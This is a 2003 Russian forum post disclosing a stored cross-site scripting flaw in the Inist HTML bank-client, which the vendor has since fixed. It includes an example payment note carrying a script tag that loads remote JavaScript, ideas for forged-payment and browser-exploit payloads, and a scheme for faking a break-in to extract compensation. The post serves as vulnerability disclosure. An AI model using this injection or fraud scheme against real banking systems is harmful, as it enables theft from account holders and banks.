Легенда:
новое сообщение
закрытая нитка
новое сообщение
в закрытой нитке
старое сообщение
|
- Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
- Новичкам также крайне полезно ознакомиться с данным документом.
Ошибка в банк-клиенте от Инист 26.01.03 14:05
Автор: Komlin Статус: Незарегистрированный пользователь Отредактировано 27.01.03 12:30 Количество правок: 3
|
Сейчас всё большую популярность приобретают Банк - Клиенты построенные по HTML технологии.
Действительно, у HTML много преимуществ особенно для пользователя и для банка в первую очередь лёгкость модернизации.
К сожалению эти системы с точки зрения безопасности являются наследниками многих болезней HTML сиcтем.
Фактически такой банк-клиент частный случай транспортной WEB системы , где в роли сообщения выступает поле примечания платёжки. Думаю, некоторые из присутствующих помнят как взламывались практически 100 % почтовых систем и форумов.
http://www.hackzone.ru/articles/testmail.html
Поэтому мне пришла в голову простая мысль: а что если в платёжку, в поле примечание, попытаться включить старую добрую теговую атаку, слегка замаскировав её, и отослать такую платёжку пользователю HTML-вского банк клиента
Например (взлом клиета)
НДС 20% -X руб. Оплата по счёту # Y от zz.zz.zz за товар A индекс по Internet-каталогу :
<script src=http://magazin.narod.ru/ZAKAZ#222.js></script>
Если эта платёжка отправляется по банк-клиенту с крупного банка, то скорее всего она дойдёт атакуемого без изменений, поскольку бухгалтера-операционистки часто даже слова HTML не знают и врядли усомнятся, что это странный индекс товара (в платёжках и более странные формулировки встречаются). Им главное, чтобы НДС и номер счёта был.
Смысл атаки в том, что код из ZAKAZ22.js спокойно выполнится на машине у клиента в момент просмотра списка платёжек или самой платёжки
В этом коде может содержаться либо эксплойт для браузера ( новые ошибки в IE появляются с завидной регулярностью, кроме того никто из пользователей всё равно браузеры не патчит, поэтому наверняка сойдёт и старая), либо скрытый генератор формы идентичной платёжной на отсылку банку.
Возможен и др. вариант применения ошибки: имитация взлома по вине банк-клиента с целью получения компенсации от банкы
Цитата с форума bankir.ru
"Вот придёт к Вам мошенник c лицом честного клиента и скажет: "Вот, смотрите меня аттаковали три месяца назад(помните я звонил Вам насчёт платежа,а Вы сказали, что с подписью всё в порядке). Милиция и эксперты вот выянили, что это было. Вот копия присланной платёжки, вот следы взлома, вот код эксплойта который был применён, а похитителя увы не нашли..., вот справка обокончании предварительного следствия.
Эксперты считают, что и доля Вашей вины здесь есть, не примите ли на себя часть расходов, чтобы долго и бесполезно не судится?"
Атака № 1 проверялась на демо-версии популярноего банк -клиента Инист (входящего в тройку лидеров рынка) .
http://www.inist.ru/servlets/ibc
Туда были вставлены простые извещения вида <script>... </script> и <iframe src= и обе сработали, причём выданы после обработки сервером.
В настоящее время ошибка устранена производителем. Справеливости ради надо заметить, что в своём ответе последний заявил, что считает данную ошибку несуществнной.
Да, ошибка была. Исправили.
Можно ли было ею воспользоваться? Сомнительно.
К сожалению, он никак не аргументировал свою точку зрения.
Первоначальное сообщение об ошибке и его обсуждение Вы можете посмотреть по нижеприведённой ссылке
Ссылка
|
|
|